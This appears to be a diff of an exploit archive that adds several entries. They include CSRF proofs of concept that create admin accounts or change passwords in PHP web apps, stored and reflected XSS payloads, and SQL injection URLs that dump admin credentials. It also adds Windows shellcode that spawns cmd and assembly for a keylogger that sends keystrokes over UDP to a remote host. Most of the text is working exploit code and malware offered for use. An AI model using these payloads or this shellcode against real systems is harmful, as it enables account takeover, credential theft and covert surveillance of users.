# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsantahir.net
# Category: webapps
# Version: 4.0.5
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
[+] CSRF bypass to Persistent XSS
1. Description
There was an Anti-CSRF token while adding a post in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter
the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed
means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website,
a blog post will be created with a tag like this: "</title><script>alert(document.domain);</script>" and now the XSS can be executed
here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
2. Proof of Concept (CSRF to Persistent XSS)
Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new post named
"Hacked by Ahsan" will be created, with a tag "</title><script>alert(document.domain);</script>", means that we exploited
CSRF sucessfully!
XSS will execute here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/blog/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------292766351574");
xhr.withCredentials = true;
var body = "-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"Hacked by Ahsan Tahir\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"alias\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"body\"\r\n" +
"\r\n" +
"\x3cp\x3eHacked by Ahsan Tahir\x3c/p\x3e\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"tags\"\r\n" +
"\r\n" +
"\x3c/title\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"v[image]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"owner\"\r\n" +
"\r\n" +
"Administrator (emailofadmin@gmail.com)\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"member_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"date_added\"\r\n" +
"\r\n" +
"2016-10-15 04:41\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------292766351574--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
[+] Add-Admin CSRF
1. Description
There was an Anti-CSRF token while adding an admin in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter
the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed
means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website,
a new admin will be created with an email which is controled by attacker, means now the attacker have full administration over the
Subrion CMS Blog!
2. Proof of Concept
Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new admin named
"Haxor" will be created, with email "ahsan@ahsan.py", means that we exploited the CSRF sucessfully, and now the attacker
has full control over the subrion blog!
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/members/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2573679013209");
xhr.withCredentials = true;
var body = "-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"haxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"fullname\"\r\n" +
"\r\n" +
"Craxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"ahsan@ahsan.py\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password2\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"website\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"biography\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"facebook\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"twitter\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"gplus\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"linkedin\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"sponsored\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured_end\"\r\n" +
"\r\n" +
"2016-11-15 04:54\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------2573679013209--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]

75
platforms/php/webapps/40554.txt Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title: PHP Image Database - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=3
# Software Link: http://www.pagereactions.com/downloads/phpimagedatabase.zip
----------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phpimagedatabase/index.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phpimagedatabase/administration.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>
# 0x01 Stored XSS
---
1.In administration web images interface (need normal user login) :
http://192.168.1.112/phpimagedatabase/administration.php
?pageaction=newimage
&MAX_FILE_SIZE=1000000
&subaction=submit
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2016
&title=<svg/onload=alert(1)>
&caption=<svg/onload=alert(2)>
&keywordtags=<svg/onload=alert(3)>
&photographer=<svg/onload=alert(4)>
&categorynewedit=
&publish=active
2.In administration web categories interface (need administrator user login) :
http://192.168.1.112/phpimagedatabase/administration.php?pageaction=newcategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpimagedatabase/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *

51
platforms/php/webapps/40555.txt Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title.............. Simple Shopping Cart Application SQL Injection
# Google Dork................ inurl:"product-details.php?prodid=" "Designed by FBC Students"
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/tyron69/ecommerce_0.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in shop/product-details.php
-------------------------------
----snip----
$prodID = intval($_GET['prodid']);
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$prodname= $getProdInfo["Product"];
----snip----
Example exploitation
--------------------
http://server/shop/product-details.php?prodid=-80%27%20union%20select%201,2,concat(username,0x3a,password),4,version(),user()%20from%20user--+
How to fix
----------
Simple method's use the php function intval.
For example
$prodID = $_GET['prodid'];
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$prodname= $getProdInfo["Product"];
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
http://php.net/manual/en/function.intval.php

58
platforms/php/webapps/40557.html Executable file
View file

@ -0,0 +1,58 @@
*=========================================================================================================
# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
# Author: Meryem AKDOĞAN
# Google Dork: -
# Date: 16/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://newsphp.sourceforge.net
# Software Link: https://sourceforge.net/projects/newsphp/
# Version: 1.3.0
*=========================================================================================================
DETAILS
========================================
PHP NEWS 1.3.0 versions is vulnerable to CSRF attack (No CSRF token in
place) meaning that if an admin user can be tricked to visit a crafted URL
created
by attacker (via spear phishing/social engineering), a form will be
submitted to (http://sitename/path/index.php) that will change admin
password.
Once exploited, the attacker can login to the admin panel using the
username and the password he posted in the form.
RISK
========================================
Attacker can change admin password with this vulnerablity
TECHNICAL DETAILS & POC
========================================
<html>
<!— CSRF PoC —>
<body>
<form action="
http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST">
<input type="hidden" name="id" value="7" />
<input type="hidden" name="newusername" value="meryem akdogan" />
<input type="hidden" name="username" value="meryem" />
<input type="hidden" name="password" value="meryem123." />
<input type="hidden" name="password2" value="meryem123." />
<input type="hidden" name="email" value="b&#64;gmail&#46;com" />
<input type="hidden" name="language" value="en&#95;GB" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
========================================

45
platforms/php/webapps/40558.txt Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title.............. School Full CBT SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/9859
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/fimo4real1992/cbt_by_ajijola_femi.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /show.php
-------------------------------
----snip----
$get = $_GET['show'];
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+
How to fix
----------
Simple method's use the php function intval.
For example
$get = intval($_GET['show']);
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/9859
http://php.net/manual/en/function.intval.php

85
platforms/php/webapps/40559.txt Executable file
View file

@ -0,0 +1,85 @@
# Exploit Title: PHP Business Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip
--------------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
# 0x01 Stored XSS
---
1.In administration web directory interface (need normal user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php
?pageaction=newsavebusiness
&subaction=submit
&businessname=<script>alert(1)</script>
&slogan=<script>alert(2)</script>
&businesslicence=<script>alert(3)</script>
&address=<script>alert(4)</script>
&city=<script>alert(5)</script>
&suburb=<script>alert(6)</script>
&businessstate=<script>alert(7)</script>
&country=<script>alert(8)</script>
&zippostcode=<script>alert(9)/*
&telephone1=*/</script><script>alert(10)</script>
&telephone2=<script>alert(11)</script>
&mobilecell=<script>alert(12)</script>
&fax=<script>alert(13)</script>
&email=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&productservice=<script>alert(19)</script>
&manager=<script>alert(20)</script>
&paymentsaccepted=<script>alert(21)</script>
2.In administration web categories interface (need administrator user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *

144
platforms/win_x86-64/shellcode/40549.c Executable file
View file

@ -0,0 +1,144 @@
/*
# Title : Windows x64 WinExec() shellcode
# Date : 15-10-2016
# Author : Roziul Hasan Khan Shifat
# size : 93 bytes
# Tested on : Windows 7 Ultimate x64
*/
/*
Disassembly of section .text:
0000000000000000 <_start>:
0: 99 cltd
1: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
6: 48 8b 40 18 mov 0x18(%rax),%rax
a: 48 8b 70 10 mov 0x10(%rax),%rsi
e: 48 ad lods %ds:(%rsi),%rax
10: 48 8b 30 mov (%rax),%rsi
13: 48 8b 7e 30 mov 0x30(%rsi),%rdi
17: 48 31 db xor %rbx,%rbx
1a: 48 31 f6 xor %rsi,%rsi
1d: 8b 5f 3c mov 0x3c(%rdi),%ebx
20: 48 01 fb add %rdi,%rbx
23: b2 88 mov $0x88,%dl
25: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
28: 48 01 fb add %rdi,%rbx
2b: 8b 73 1c mov 0x1c(%rbx),%esi
2e: 48 01 fe add %rdi,%rsi
31: 99 cltd
32: 66 ba 27 05 mov $0x527,%dx
36: 8b 04 96 mov (%rsi,%rdx,4),%eax
39: 48 01 f8 add %rdi,%rax
3c: eb 17 jmp 55 <c>
000000000000003e <exec>:
3e: 59 pop %rcx
3f: 99 cltd
40: 48 ff c2 inc %rdx
43: ff d0 callq *%rax
45: 99 cltd
46: 66 ba 29 01 mov $0x129,%dx
4a: 8b 04 96 mov (%rsi,%rdx,4),%eax
4d: 48 01 f8 add %rdi,%rax
50: 48 31 c9 xor %rcx,%rcx
53: ff d0 callq *%rax
0000000000000055 <c>:
55: e8 e4 ff ff ff callq 3e <exec>
5a: 63 6d 64 movslq 0x64(%rbp),%ebp
...
*/
/*
bits 64
section .text
global _start
_start:
cdq
mov rax,[gs:rdx+0x60] ;PEB
mov rax,[rax+0x18] ;PEB.Ldr
mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address
xor rbx,rbx
xor rsi,rsi
mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi ;PE HEADER
mov dl,0x88
mov ebx,[rbx+rdx] ;DataDirectory->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY
mov esi,[rbx+0x1c] ;AddressOfFunctions
add rsi,rdi
cdq
mov dx,1319 ;Ordinal of WinExec()
mov eax,[rsi+rdx*4]
add rax,rdi ;rax=WinExec()
;WinExec("cmd",1)
jmp c
exec:
pop rcx
cdq
inc rdx
call rax
cdq
mov dx,297
mov eax,[rsi+rdx*4]
add rax,rdi ;rax=FatalExit()
;FatalExit(0)
xor rcx,rcx
call rax
c:
call exec
db 'cmd',0,0
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
char shellcode[]="\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x48\x31\xdb\x48\x31\xf6\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x66\xba\x27\x05\x8b\x04\x96\x48\x01\xf8\xeb\x17\x59\x99\x48\xff\xc2\xff\xd0\x99\x66\xba\x29\x01\x8b\x04\x96\x48\x01\xf8\x48\x31\xc9\xff\xd0\xe8\xe4\xff\xff\xff\x63\x6d\x64";
main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length %d bytes\n",len );
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode ) ();
}

266
platforms/win_x86/shellcode/40560.asm Executable file
View file

@ -0,0 +1,266 @@
; Exploit Title: x86 windows shellcode - keylogger reverse udp - 493 bytes
; Date: Fri Oct 13 12:58:35 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all win
; Tested on: Windows 7(x86), 8.1(x86), 10(x86_64)
; Note: it will write to single byte payload udp packets to host.
; keystrokes are written in format: "Virtual-Key Codes", from
; msdn.microsoft.com website
section .bss
section .data
section .text
global _start
_start:
cld ; 00000000 FC
call dword loc_88h ; 00000001 E882000000
pushad ; 00000006 60
mov ebp,esp ; 00000007 89E5
xor eax,eax ; 00000009 31C0
mov edx,[fs:eax+0x30] ; 0000000B 648B5030
mov edx,[edx+0xc] ; 0000000F 8B520C
mov edx,[edx+0x14] ; 00000012 8B5214
loc_15h:
mov esi,[edx+0x28] ; 00000015 8B7228
movzx ecx,word [edx+0x26] ; 00000018 0FB74A26
xor edi,edi ; 0000001C 31FF
loc_1eh:
lodsb ; 0000001E AC
cmp al,0x61 ; 0000001F 3C61
jl loc_25h ; 00000021 7C02
sub al,0x20 ; 00000023 2C20
loc_25h:
ror edi,byte 0xd ; 00000025 C1CF0D
add edi,eax ; 00000028 01C7
loop loc_1eh ; 0000002A E2F2
push edx ; 0000002C 52
push edi ; 0000002D 57
mov edx,[edx+0x10] ; 0000002E 8B5210
mov ecx,[edx+0x3c] ; 00000031 8B4A3C
mov ecx,[ecx+edx+0x78] ; 00000034 8B4C1178
jecxz loc_82h ; 00000038 E348
add ecx,edx ; 0000003A 01D1
push ecx ; 0000003C 51
mov ebx,[ecx+0x20] ; 0000003D 8B5920
add ebx,edx ; 00000040 01D3
mov ecx,[ecx+0x18] ; 00000042 8B4918
loc_45h:
jecxz loc_81h ; 00000045 E33A
dec ecx ; 00000047 49
mov esi,[ebx+ecx*4] ; 00000048 8B348B
add esi,edx ; 0000004B 01D6
xor edi,edi ; 0000004D 31FF
loc_4fh:
lodsb ; 0000004F AC
ror edi,byte 0xd ; 00000050 C1CF0D
add edi,eax ; 00000053 01C7
cmp al,ah ; 00000055 38E0
jnz loc_4fh ; 00000057 75F6
add edi,[ebp-0x8] ; 00000059 037DF8
cmp edi,[ebp+0x24] ; 0000005C 3B7D24
jnz loc_45h ; 0000005F 75E4
pop eax ; 00000061 58
mov ebx,[eax+0x24] ; 00000062 8B5824
add ebx,edx ; 00000065 01D3
mov cx,[ebx+ecx*2] ; 00000067 668B0C4B
mov ebx,[eax+0x1c] ; 0000006B 8B581C
add ebx,edx ; 0000006E 01D3
mov eax,[ebx+ecx*4] ; 00000070 8B048B
add eax,edx ; 00000073 01D0
mov [esp+0x24],eax ; 00000075 89442424
pop ebx ; 00000079 5B
pop ebx ; 0000007A 5B
popad ; 0000007B 61
pop ecx ; 0000007C 59
pop edx ; 0000007D 5A
push ecx ; 0000007E 51
jmp eax ; 0000007F FFE0
loc_81h:
pop edi ; 00000081 5F
loc_82h:
pop edi ; 00000082 5F
pop edx ; 00000083 5A
mov edx,[edx] ; 00000084 8B12
jmp short loc_15h ; 00000086 EB8D
loc_88h:
pop ebp ; 00000088 5D
push dword 0x3233 ; 00000089 6833320000
push dword 0x5f327377 ; 0000008E 687773325F
push esp ; 00000093 54
push dword 0x726774c ; 00000094 684C772607
call ebp ; 00000099 FFD5
mov eax,0x190 ; 0000009B B890010000
sub esp,eax ; 000000A0 29C4
push esp ; 000000A2 54
push eax ; 000000A3 50
push dword 0x6b8029 ; 000000A4 6829806B00
call ebp ; 000000A9 FFD5
push byte +0x10 ; 000000AB 6A10
jmp dword loc_1ceh ; 000000AD E91C010000
loc_b2h:
push dword 0x803428a9 ; 000000B2 68A9283480
call ebp ; 000000B7 FFD5
lea esi,[eax+0x1c] ; 000000B9 8D701C
xchg esi,esp ; 000000BC 87F4
pop eax ; 000000BE 58
xchg esp,esi ; 000000BF 87E6
mov esi,eax ; 000000C1 89C6
push dword 0x6c6c ; 000000C3 686C6C0000
push dword 0x642e7472 ; 000000C8 6872742E64
push dword 0x6376736d ; 000000CD 686D737663
push esp ; 000000D2 54
push dword 0x726774c ; 000000D3 684C772607
call ebp ; 000000D8 FFD5
jmp dword loc_1e3h ; 000000DA E904010000
loc_dfh:
push dword 0xd1ecd1f ; 000000DF 681FCD1E0D
call ebp ; 000000E4 FFD5
xchg ah,al ; 000000E6 86E0
ror eax,byte 0x10 ; 000000E8 C1C810
inc eax ; 000000EB 40
inc eax ; 000000EC 40
push esi ; 000000ED 56
push eax ; 000000EE 50
mov esi,esp ; 000000EF 89E6
xor eax,eax ; 000000F1 31C0
push eax ; 000000F3 50
push eax ; 000000F4 50
push eax ; 000000F5 50
push eax ; 000000F6 50
inc eax ; 000000F7 40
inc eax ; 000000F8 40
push eax ; 000000F9 50
push eax ; 000000FA 50
push dword 0xe0df0fea ; 000000FB 68EA0FDFE0
call ebp ; 00000100 FFD5
mov edi,eax ; 00000102 89C7
loc_104h:
push byte +0x10 ; 00000104 6A10
push esi ; 00000106 56
push edi ; 00000107 57
push dword 0x6174a599 ; 00000108 6899A57461
call ebp ; 0000010D FFD5
test eax,eax ; 0000010F 85C0
jz loc_122h ; 00000111 740F
dec dword [esi+0x8] ; 00000113 FF4E08
jnz loc_104h ; 00000116 75EC
xor eax,eax ; 00000118 31C0
push eax ; 0000011A 50
push dword 0x56a2b5f0 ; 0000011B 68F0B5A256
call ebp ; 00000120 FFD5
loc_122h:
push dword 0x3233 ; 00000122 6833320000
push dword 0x72657375 ; 00000127 6875736572
push esp ; 0000012C 54
push dword 0x726774c ; 0000012D 684C772607
call ebp ; 00000132 FFD5
push dword 0x657461 ; 00000134 6861746500
push dword 0x74537965 ; 00000139 6865795374
push dword 0x4b746547 ; 0000013E 684765744B
push esp ; 00000143 54
push eax ; 00000144 50
push dword 0x7802f749 ; 00000145 6849F70278
call ebp ; 0000014A FFD5
push esi ; 0000014C 56
push edi ; 0000014D 57
push eax ; 0000014E 50
xor ecx,ecx ; 0000014F 31C9
mov esi,ecx ; 00000151 89CE
mov cl,0x8 ; 00000153 B108
loc_155h:
push esi ; 00000155 56
loop loc_155h ; 00000156 E2FD
loc_158h:
xor ecx,ecx ; 00000158 31C9
xor esi,esi ; 0000015A 31F6
push byte +0x8 ; 0000015C 6A08
push dword 0xe035f044 ; 0000015E 6844F035E0
call ebp ; 00000163 FFD5
loc_165h:
mov eax,esi ; 00000165 89F0
cmp al,0xff ; 00000167 3CFF
jnc loc_158h ; 00000169 73ED
inc esi ; 0000016B 46
push esi ; 0000016C 56
call dword [esp+0x24] ; 0000016D FF542424
mov edx,esi ; 00000171 89F2
xor ecx,ecx ; 00000173 31C9
mov cl,0x80 ; 00000175 B180
and eax,ecx ; 00000177 21C8
xor ecx,ecx ; 00000179 31C9
cmp eax,ecx ; 0000017B 39C8
jnz loc_18fh ; 0000017D 7510
xor edx,edx ; 0000017F 31D2
mov ecx,edx ; 00000181 89D1
mov eax,esi ; 00000183 89F0
mov cl,0x20 ; 00000185 B120
div ecx ; 00000187 F7F1
btr [esp+eax*4],edx ; 00000189 0FB31484
jmp short loc_165h ; 0000018D EBD6
loc_18fh:
xor edx,edx ; 0000018F 31D2
mov ecx,edx ; 00000191 89D1
mov eax,esi ; 00000193 89F0
mov cl,0x20 ; 00000195 B120
div ecx ; 00000197 F7F1
bt [esp+eax*4],edx ; 00000199 0FA31484
jc loc_165h ; 0000019D 72C6
xor edx,edx ; 0000019F 31D2
mov ecx,edx ; 000001A1 89D1
mov eax,esi ; 000001A3 89F0
mov cl,0x20 ; 000001A5 B120
div ecx ; 000001A7 F7F1
bts [esp+eax*4],edx ; 000001A9 0FAB1484
push esi ; 000001AD 56
push byte +0x10 ; 000001AE 6A10
push dword [esp+0x30] ; 000001B0 FF742430
push byte +0x0 ; 000001B4 6A00
push byte +0x1 ; 000001B6 6A01
lea ecx,[esp+0x10] ; 000001B8 8D4C2410
push ecx ; 000001BC 51
push dword [esp+0x3c] ; 000001BD FF74243C
push dword 0xdf5c9d75 ; 000001C1 68759D5CDF
call ebp ; 000001C6 FFD5
lea esp,[esp+0x4] ; 000001C8 8D642404
jmp short loc_158h ; 000001CC EB8A
loc_1ceh:
call dword loc_b2h ; 000001CE E8DFFEFFFF
db "www.example.com",0
loc_1e3h:
call dword loc_dfh
db "4444",0
;"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b"
;"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c"
;"\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
;"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20"
;"\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
;"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
;"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
;"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
